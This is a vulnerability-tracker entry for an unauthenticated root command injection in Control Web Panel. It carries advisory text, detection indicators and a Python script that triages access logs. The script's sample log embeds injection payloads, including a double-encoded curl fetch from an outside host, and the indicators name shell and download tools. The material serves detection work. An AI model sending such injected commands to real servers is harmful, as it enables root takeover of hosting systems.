CVE-2025-67888
Published 2026-05-08
Priority P2 · 60 · high · CVSS 3.1 base score 7.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
Note: the vector's impact metrics (C:L/I:L/A:L) understate the description's claim of unauthenticated OS command execution as root, which would ordinarily be scored C:H/I:H/A:H for a 9.8; treat the 7.3 as a floor, not a ceiling, when prioritizing.
EXPLOIT: EPSS 1.19% (64.0th percentile)
An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the "key" GET parameter to /admin/index.php (when the "api" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present.
Detection & IOCs (extracted from sources)
- Monitor HTTP GET requests to /admin/index.php containing both the 'api' and 'key' parameters; inspect the 'key' parameter value for OS command injection characters (e.g., ;, |, $(), backticks, &&).
- Alert on unauthenticated requests (no valid session/auth headers) to /admin/index.php with both 'api' and 'key' GET parameters present, as exploitation does not require authentication.
- Exploitation typically requires Softaculous and/or SitePad to be installed; presence of these components on a CWP server increases risk and should be factored into prioritization of detection/patching.
- Flag any process spawned by the CWP web server process (e.g., Apache/Nginx running as root) that is a shell (sh, bash, etc.) or common post-exploitation binary (curl, wget, python, perl), as successful exploitation runs commands as root.
- Exploitation requires Softaculous and/or SitePad to be installed via the CWP Scripts Manager. Instances without these components may not be exploitable.
- Only CWP versions up to and including 0.9.8.1208 are vulnerable; version 0.9.8.1209 and later contain the fix.
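The first two detection bullets above describe a log-based check: GET requests to /admin/index.php that carry both 'api' and 'key', with the 'key' value inspected for shell metacharacters. The script below is an added example of that check, not code from the page's sources or from CWP. It parses web-server access-log lines in combined format (the sample lines are constructed for illustration; the real CWP admin-panel log format and path may differ), decodes the 'key' value a second time to catch double-URL-encoded payloads, and grades each hit. It does not attempt to judge authentication from the access log alone: the remote-user field is only a weak hint, and session validity has to come from the application's own auth logs.

```python
"""Access-log triage for the CVE-2025-67888 detection bullets (added example)."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Shell metacharacters named in the detection bullet (; | $( ) backtick &&) plus
# a few others commonly used in command injection.
META_RE = re.compile(r"[;|&`$(){}<>\n]")

# Combined-log style line: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

TARGET_PATH = "/admin/index.php"  # path named in the advisory

# Constructed sample log lines (not real traffic). Line 3 carries a
# double-URL-encoded `x$(curl http://198.51.100.7/a)` in the key parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [08/May/2026:10:01:02 +0000] "GET /admin/index.php?api=1&key=abc123 HTTP/1.1" 200 512
203.0.113.9 - - [08/May/2026:10:01:07 +0000] "GET /admin/index.php?api=1&key=x%3Bid HTTP/1.1" 200 77
203.0.113.9 - - [08/May/2026:10:01:09 +0000] "GET /admin/index.php?api=1&key=x%2524%2528curl%2520http%253A%252F%252F198.51.100.7%252Fa%2529 HTTP/1.1" 200 77
198.51.100.2 - - [08/May/2026:10:02:00 +0000] "GET /admin/index.php?module=users HTTP/1.1" 302 0
198.51.100.2 - - [08/May/2026:10:02:01 +0000] "GET /index.php?api=1&key=%3Bid HTTP/1.1" 404 0
"""


def analyze(line: str) -> Optional[dict]:
    """Return a finding for a request matching the detection pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != TARGET_PATH:
        return None
    # parse_qs performs one round of percent-decoding; a raw (unencoded) '&'
    # inside key would split the value, so attackers normally encode it.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "api" not in qs or "key" not in qs:
        return None
    # Second decode catches double-encoded payloads such as %2524 -> %24 -> $
    key_vals = [unquote(v) for v in qs["key"]]
    metachars = any(META_RE.search(v) for v in key_vals)
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "remote_user": m.group("user"),  # '-' only hints at no HTTP auth
        "key": key_vals,
        "metachars": metachars,
        # Both parameters present is worth a look even without metacharacters;
        # shell syntax in key is the strong signal.
        "severity": "high" if metachars else "medium",
    }


def scan(log_text: str) -> list:
    """Run analyze() over every line and collect the findings in log order."""
    return [f for f in (analyze(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} key={f['key']!r}")
```

Run it against a real log by replacing SAMPLE_LOG with the file contents; anything graded "high" should be correlated with the process-spawn bullet above (a shell or curl/wget/python/perl child of the panel's web server around the same timestamp) before escalating.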
No detection rules found.
No writeups or analysis indexed.